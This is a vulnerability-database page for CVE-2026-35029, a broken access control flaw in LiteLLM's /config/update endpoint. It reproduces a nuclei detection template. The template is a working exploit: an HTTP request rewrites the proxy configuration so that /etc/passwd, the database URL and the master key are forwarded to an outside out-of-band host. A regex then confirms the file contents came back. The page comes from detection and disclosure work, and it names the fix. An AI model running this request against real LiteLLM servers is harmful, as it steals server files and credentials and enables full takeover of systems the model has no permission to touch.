Lucene search
K

LiteLLM - Arbitrary File Read

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 27 Views

LiteLLM allows authenticated users to read files via /config/update; upgrade to 1.83.0.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Incorrect Authorization in Litellm
19 May 202608:08
githubexploit
ATTACKERKB
CVE-2026-35029
6 Apr 202616:35
attackerkb
Chainguard
CVE-2026-35029 vulnerabilities
8 Apr 202619:17
cgr
Circl
CVE-2026-35029
6 Apr 202618:32
circl
CNNVD
LiteLLM 安全漏洞
6 Apr 202600:00
cnnvd
CVE
CVE-2026-35029
6 Apr 202616:35
cve
Cvelist
CVE-2026-35029 LiteLLM affected by privilege escalation via unrestricted proxy configuration endpoint
6 Apr 202616:35
cvelist
Github Security Blog
LiteLLM: Privilege escalation via unrestricted proxy configuration endpoint
3 Apr 202621:59
github
NVD
CVE-2026-35029
6 Apr 202617:17
nvd
OSV
CGA-HXF2-MQR8-F3QR
8 Apr 202615:30
osv
Rows per page
id: CVE-2026-35029

info:
  name: LiteLLM - Arbitrary File Read
  author: theamanrawat
  severity: high
  description: |
    LiteLLM < 1.83.0 contains a broken access control vulnerability caused by lack of admin role enforcement on /config/update endpoint, letting authenticated users modify configurations, execute code, read files, and take over accounts.
  impact: |
    Authenticated users can execute arbitrary code, read server files, and take over privileged accounts, leading to full system compromise.
  remediation: |
    Update to version 1.83.0 or later.
  reference:
    - https://github.com/BerriAI/litellm
    - https://sec-consult.com/vulnerability-lab/advisory/broken-access-control-in-config-endpoint-in-litellm/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-35029
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2026-35029
    epss-score: 0.26409
    epss-percentile: 0.9776
    cwe-id: CWE-863
  metadata:
    max-request: 4
    verified: true
    vendor: berriai
    product: litellm
  tags: cve,cve2026,litellm,file-read,oob,oidc,oast,vuln,authenticated

http:
  - raw:
      - |
        POST /config/update HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{userkey}}
        Content-Type: application/json

        {"environment_variables":{"FILE_TO_READ":"/etc/passwd","EXFIL_PREFIX":"EXFIL"},"general_settings":{"pass_through_endpoints":[{"path":"/exfil-{{randstr}}","target":"https://{{interactsh-url}}","headers":{"LANGFUSE_PUBLIC_KEY":"os.environ/EXFIL_PREFIX","LANGFUSE_SECRET_KEY":"os.environ/oidc/env_path/FILE_TO_READ","X-DB-URL":"os.environ/DATABASE_URL","X-Master-Key":"os.environ/LITELLM_MASTER_KEY"}}]}}

      - |
        GET /health/liveliness HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /exfil-{{randstr}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: interactsh_request
        name: content
        group: 1
        regex:
          - "Authorization:\\s*Basic\\s+([A-Za-z0-9+/=]+)"
        internal: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "http")'
          - 'regex("EXFIL:root:.*:0:0:", base64_decode(content))'
        condition: and
# digest: 490a0046304402206949f63d61b40c26f6f82d0a122e942ad2717bd84c1480cea59ef94ac79c54b302203d5abd03c399faaf95bdb3f37e95757fe1c994fde6cf3ef6ebf1d79529a64962:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Apr 2026 07:35Current
6Medium risk
Vulners AI Score6
CVSS 3.18.8
CVSS 48.7
EPSS0.26409
SSVC
27